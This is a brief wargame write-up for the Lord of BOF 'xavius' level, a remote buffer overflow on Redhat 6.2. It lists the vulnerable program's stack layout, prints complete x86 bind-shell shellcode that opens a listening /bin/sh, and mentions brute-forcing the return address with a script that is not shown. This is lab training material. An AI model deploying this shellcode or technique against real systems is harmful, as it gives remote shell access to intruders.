Wargames/Load Of BOF
LOB Redhat 6.2 - xavius
5unKn0wn
2015. 11. 2. 09:20
xavius - Remote BOF
Stack : sin_size[4] + client_addr[16] + server_addr[16] + client_id[4] + server_id[4] + buffer[40] + sfp[4] + ret[4]
bind shellcode : \x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80
LOB20.py
return address : BruteForcing
Using Remote BOF